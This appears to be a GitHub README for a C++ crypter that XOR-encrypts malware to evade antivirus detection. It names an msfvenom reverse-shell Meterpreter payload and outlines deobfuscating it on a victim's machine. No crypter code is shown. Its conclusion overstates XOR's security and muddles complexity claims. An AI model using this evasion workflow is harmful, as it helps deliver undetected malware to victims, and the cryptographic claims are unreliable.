Skip to content

A Scantime Crytper that applies an obfuscation method onto a malware/false-positive so an antivirus cannot successfully match it with any malicious signature, evading antivirus signature-based detection.

Notifications You must be signed in to change notification settings

AnshumanSrivastava108/Static-Scantime-Crypter

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Static-Scantime-Crypter

The project aims at building a Scan-Time Crypter in C++, that can assist a malware/false-positives in bypassing antivirus software. This Project is coded for Security purpose, it can be used to protect files against Reverse Engineering. The Crypter will open the target file from the disk while creating another output file to the disk. The Crypter will then extract the contents from the malware and obfuscate them using XOR encryption algorithm.

Tested On

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 10

Language and IDE Used

  • C++ - General purpose, case-sensitive, free-form programming language that supports object-oriented, procedural and generic programming
  • Visual Studio - Integrated development environment from Microsoft. Visual Studio dev tools & services make development easy for C++ language.

Implementation Summary

  1. Creating a Malware: A windows meterpreter payload is crafted using msfvenom. Command used is - msfvenom –p windows/meterpreter/reverse/tcp to create a reverse tcp meterpreter shell for windows 64bit OS. At the end of this step, an executable file called payload.exe will be created.

  2. Encrypting the Malware using File Handling and XOR Encryption:

    1. The file will be read using the function fopen() and mode ‘r’.

    2. The contents of the file will be retrieved using the fgets() function until it reachs EOF.

    3. The contents of the file will be XORed.

    4. The encrypted contents will be then written to a new file and the stream will be closed to prevent data leakage.

  3. Execution and Deobfuscation: The contents of the file will be deobfuscated when it is executed on the victim’s machine. Deobfuscation will be carried out using the same keys from encryption process.

  4. Testing the Cryper: The Crypter will then be tested on services like www.virustotal.com and other antivirus software to prove the successful bypassing of Malware from security software.

Scan Results:

Conclusion

  • Obfuscating a malware using XOR encryption is better than other algorithms. When we XOR a piece of text, each character undergoes a bitwise operation. The encrypted piece of text can only be decrypted only by someone who has the key. To everyone else, the piece of text is just gibberish. This way, XOR Encryption takes the lead when compared to other algorithms like ROT13 or Base64 encoding. We see that the latter two do not need keys, hence can be easily decrypted and are less secure.

  • The XOR encryption algorithm has a time complexity of O(n), which is the same as Base64 Encoding and ROT13, but the latter two have greater space complexities, and hence the encryption and decryption process becomes longer since the number of variables and the execution time is more.

  • In conclusion, the XOR Encryption algorithm is much more compact, reliable and efficient in comparison to other algorithms like Base64 Encoding and ROT13.

Author

Anshuman Srivastava

About

A Scantime Crytper that applies an obfuscation method onto a malware/false-positive so an antivirus cannot successfully match it with any malicious signature, evading antivirus signature-based detection.

Topics

Resources

Stars

Watchers

Forks